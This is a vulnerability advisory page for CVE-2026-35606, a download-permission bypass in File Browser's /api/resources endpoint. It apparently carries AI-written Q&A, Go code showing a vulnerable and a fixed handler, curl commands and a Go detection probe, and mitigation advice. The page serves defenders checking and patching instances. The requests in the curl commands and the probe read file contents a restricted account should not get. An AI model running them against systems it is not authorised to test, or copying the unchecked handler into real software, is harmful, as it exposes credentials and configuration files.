CVE-2026-35606
Unauthorized File Read via Permission Bypass in File Browser
Publication date: 2026-04-07
Last updated on: 2026-04-16
Assigner: GitHub, Inc.
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| filebrowser | filebrowser | up to and including 2.63.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-35606 is a moderate severity vulnerability in the File Browser project affecting versions up to and including 2.63.0. The issue is in the resourceGetHandler function, which serves the full content of text files through the /api/resources endpoint without checking whether the user has the Perm.Download permission.
The other file-serving endpoints (/api/raw, /api/preview, /api/subtitle) check this permission and refuse to serve content when it is false; /api/resources does not. A user whose download permission is false can therefore read any text file within their scope, either by requesting the resource normally and taking the content from the content field of the JSON response, or by sending the X-Encoding header to receive the raw file bytes.
The root cause is that the handler always loads and returns text content regardless of the download permission, and the code path that handles the X-Encoding header likewise returns raw bytes without a permission check. This is a missing authorization weakness (CWE-862). The fix in version 2.63.1 adds the Perm.Download check to this handler.
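To make the gap concrete, here is an added Go example (not File Browser's code) that models the pattern the advisory describes: a resources handler that returns a text file's content in its JSON response and, when an X-Encoding header is present, as raw bytes, beside the same handler with the Perm.Download check applied. The User, Perm and resource types, the in-memory file map and its contents are constructed for the example; only the endpoint path, the header name, the permission name and the 202 response follow the advisory.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"path"
	"strings"
)

// Perm is a stand-in for the per-user permission flags; only Download matters here.
type Perm struct{ Download bool }

// User carries the flag the advisory says /api/resources failed to consult.
type User struct{ Perm Perm }

// resource is a cut-down version of the JSON the resources endpoint returns:
// file metadata plus, for text files, the full content.
type resource struct {
	Name    string `json:"name"`
	Content string `json:"content,omitempty"`
}

// files is a constructed in-memory stand-in for the user's scope; path-based
// authorization is taken as already done (the advisory says it is still
// enforced). The contents are made up for the example.
var files = map[string]string{
	"/notes.txt":   "db_password=example-not-a-real-secret\n",
	"/config.yaml": "api_token: example-not-a-real-token\n",
}

// serveResource is the body shared by both handlers. With checkDownload=false
// it reproduces the pattern the advisory describes: text content is always
// loaded and returned, and the X-Encoding branch writes the raw bytes, neither
// gated on Perm.Download. With checkDownload=true it applies the check the
// other endpoints already had and answers 202 Accepted with an empty body.
func serveResource(u User, checkDownload bool, w http.ResponseWriter, r *http.Request) {
	p := strings.TrimPrefix(r.URL.Path, "/api/resources")
	data, ok := files[p]
	if !ok {
		http.NotFound(w, r)
		return
	}
	if checkDownload && !u.Perm.Download {
		w.WriteHeader(http.StatusAccepted)
		return
	}
	if r.Header.Get("X-Encoding") != "" {
		w.Header().Set("Content-Type", "application/octet-stream")
		w.Write([]byte(data))
		return
	}
	w.Header().Set("Content-Type", "application/json")
	json.NewEncoder(w).Encode(resource{Name: path.Base(p), Content: data})
}

// VulnerableHandler serves content to everyone in scope, download permission or not.
func VulnerableHandler(u User) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) { serveResource(u, false, w, r) }
}

// FixedHandler withholds content (JSON and raw) from users without Perm.Download.
func FixedHandler(u User) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) { serveResource(u, true, w, r) }
}

// Probe sends one request to a handler in-process and returns status,
// Content-Type and body, so both bypass paths can be checked without a server.
func Probe(h http.Handler, filePath string, xEncoding bool) (int, string, string) {
	req := httptest.NewRequest(http.MethodGet, "/api/resources"+filePath, nil)
	if xEncoding {
		req.Header.Set("X-Encoding", "true")
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code, rec.Header().Get("Content-Type"), rec.Body.String()
}

func main() {
	noDownload := User{Perm: Perm{Download: false}}
	handlers := []struct {
		name string
		h    http.Handler
	}{{"vulnerable", VulnerableHandler(noDownload)}, {"fixed", FixedHandler(noDownload)}}
	for _, hd := range handlers {
		for _, enc := range []bool{false, true} {
			code, ct, body := Probe(hd.h, "/notes.txt", enc)
			fmt.Printf("%-10s X-Encoding=%-5v -> %d %-24s %q\n", hd.name, enc, code, ct, body)
		}
	}
}
```

Running it prints four lines: the vulnerable handler hands the secret-looking line to the no-download user both as the JSON content field and as octet-stream bytes, while the fixed handler answers 202 with an empty body on both paths. The point of sharing one body between the two handlers is that the fix is a single early return placed before either output branch; a check added only to the JSON branch would leave the X-Encoding path open.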
How can this vulnerability impact me?
This vulnerability allows users who do not have download permissions to read the full contents of text files within their authorized scope. This can lead to unauthorized disclosure of sensitive information.
- Exposure of sensitive data such as source code.
- Leakage of configuration files.
- Access to credentials and API tokens.
Although path-based authorization is still enforced, the bypass of the download permission check means that users can access file contents they should not be able to download, potentially leading to data breaches or information leakage.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
To check an instance, use an account whose download permission is set to false and see whether /api/resources still returns the full content of a text file in that user's scope.
There are two bypass paths to test:
- Request /api/resources for the file normally and inspect the content field of the JSON response.
- Request /api/resources with the header X-Encoding: true; a vulnerable instance returns the raw file bytes as application/octet-stream.
If either request returns the file's content even though the user lacks download permission, the instance is vulnerable.
As a control, the same user's request to /api/raw should return HTTP 202 Accepted with an empty body when the permission check is enforced. If /api/raw returns the content, the account actually has download permission and the test is not meaningful.
Example curl commands:
- curl -i -H "Authorization: Bearer <token>" "https://<filebrowser-host>/api/resources?path=<file-path>"
- curl -i -H "Authorization: Bearer <token>" -H "X-Encoding: true" "https://<filebrowser-host>/api/resources?path=<file-path>"
- curl -i -H "Authorization: Bearer <token>" "https://<filebrowser-host>/api/raw?path=<file-path>"
Replace <token>, <filebrowser-host>, and <file-path> with values for your environment; the token must belong to the account without download permission.
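The three requests above, as an added Go probe (not part of the advisory or of the project) that runs them against an instance and classifies the responses. Base URL, token and file path are command-line arguments. The Authorization: Bearer header and the ?path= query form are copied from the curl commands above and are assumptions; adjust them if the deployment expects a different token header or path syntax. The token must belong to an account whose download permission is false, which the probe checks by treating content from /api/raw as a sign that the account is not actually restricted.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/url"
	"os"
	"strings"
	"time"
)

// Verdict records what one request returned.
type Verdict struct {
	Check           string
	Status          int
	ContentReturned bool
}

// get performs one GET, carrying the token in the header the curl commands above
// use (assumption: adjust if the deployment expects a different token header),
// and returns status, Content-Type and up to 1 MiB of the body.
func get(c *http.Client, base, endpoint, token, filePath string, xEncoding bool) (int, string, string, error) {
	req, err := http.NewRequest(http.MethodGet, base+endpoint+"?path="+url.QueryEscape(filePath), nil)
	if err != nil {
		return 0, "", "", err
	}
	req.Header.Set("Authorization", "Bearer "+token)
	if xEncoding {
		req.Header.Set("X-Encoding", "true")
	}
	resp, err := c.Do(req)
	if err != nil {
		return 0, "", "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	return resp.StatusCode, resp.Header.Get("Content-Type"), string(body), err
}

// CheckInstance runs the three requests against base with a token for a user
// whose download permission is false and reports, per request, whether file
// content came back.
func CheckInstance(base, token, filePath string) ([]Verdict, error) {
	c := &http.Client{Timeout: 10 * time.Second}
	base = strings.TrimRight(base, "/")

	// Path 1: plain /api/resources, content in the JSON "content" field.
	st, _, body, err := get(c, base, "/api/resources", token, filePath, false)
	if err != nil {
		return nil, err
	}
	var res struct {
		Content string `json:"content"`
	}
	_ = json.Unmarshal([]byte(body), &res) // a non-JSON body simply leaves Content empty
	v := []Verdict{{"/api/resources (JSON content field)", st, st == http.StatusOK && res.Content != ""}}

	// Path 2: /api/resources with X-Encoding, raw bytes as application/octet-stream.
	st, ct, body, err := get(c, base, "/api/resources", token, filePath, true)
	if err != nil {
		return nil, err
	}
	v = append(v, Verdict{"/api/resources (X-Encoding)", st,
		st == http.StatusOK && strings.HasPrefix(ct, "application/octet-stream") && body != ""})

	// Control: /api/raw should answer 202 Accepted with an empty body for this user.
	st, _, body, err = get(c, base, "/api/raw", token, filePath, false)
	if err != nil {
		return nil, err
	}
	v = append(v, Verdict{"/api/raw (control)", st, st == http.StatusOK && body != ""})
	return v, nil
}

// Vulnerable is true when either /api/resources path returned content while the
// control did not, i.e. the download permission is enforced on /api/raw but not here.
func Vulnerable(v []Verdict) bool {
	return len(v) == 3 && !v[2].ContentReturned && (v[0].ContentReturned || v[1].ContentReturned)
}

func main() {
	if len(os.Args) != 4 {
		fmt.Fprintln(os.Stderr, "usage: probe <base-url> <token-of-user-without-download> <file-path>")
		os.Exit(2)
	}
	v, err := CheckInstance(os.Args[1], os.Args[2], os.Args[3])
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	for _, r := range v {
		fmt.Printf("%-36s status=%d content_returned=%v\n", r.Check, r.Status, r.ContentReturned)
	}
	switch {
	case v[2].ContentReturned:
		fmt.Println("inconclusive: /api/raw served the file, so this account has download permission")
	case Vulnerable(v):
		fmt.Println("VULNERABLE: /api/resources serves content without the download permission")
		os.Exit(1)
	default:
		fmt.Println("not vulnerable by this check")
	}
}
```

Point it at a text file the restricted user can see in the listing (go run probe.go https://files.example.internal "$TOKEN" /shared/README.txt). An exit status of 1 with the VULNERABLE line means at least one of the two /api/resources paths returned content while /api/raw correctly withheld it; the inconclusive branch guards against the common mistake of testing with a token whose user has download permission after all.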
What immediate steps should I take to mitigate this vulnerability?
Upgrade File Browser to version 2.63.1 or later, where this vulnerability is fixed.
The fix makes the /api/resources endpoint check the Perm.Download flag before serving full text or raw file content, returning HTTP 202 Accepted when download permission is denied.
Until the upgrade can be applied, the exposure can be reduced but not removed: blocking /api/resources at a reverse proxy stops both bypass paths but also breaks directory browsing in the web UI, and stripping or blocking the X-Encoding header only closes the raw-bytes path, because the JSON response still carries the content. Logging requests to /api/resources from accounts without download permission at least makes attempts visible.
Also review user permissions so that only trusted users have download permission, and until the upgrade treat every text file within the scope of a user who lacks it (configuration files, credentials, API tokens) as readable by that user.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability allows users without download permission to read the full contents of text files within their authorized scope, potentially exposing sensitive data such as source code, configuration files, credentials, and API tokens.
Such unauthorized access to sensitive information can lead to non-compliance with common standards and regulations like GDPR and HIPAA, which require strict access controls and protection of sensitive data.
Because the vulnerability bypasses permission checks, it increases the risk of data exposure, which may result in violations of data privacy and security requirements mandated by these regulations.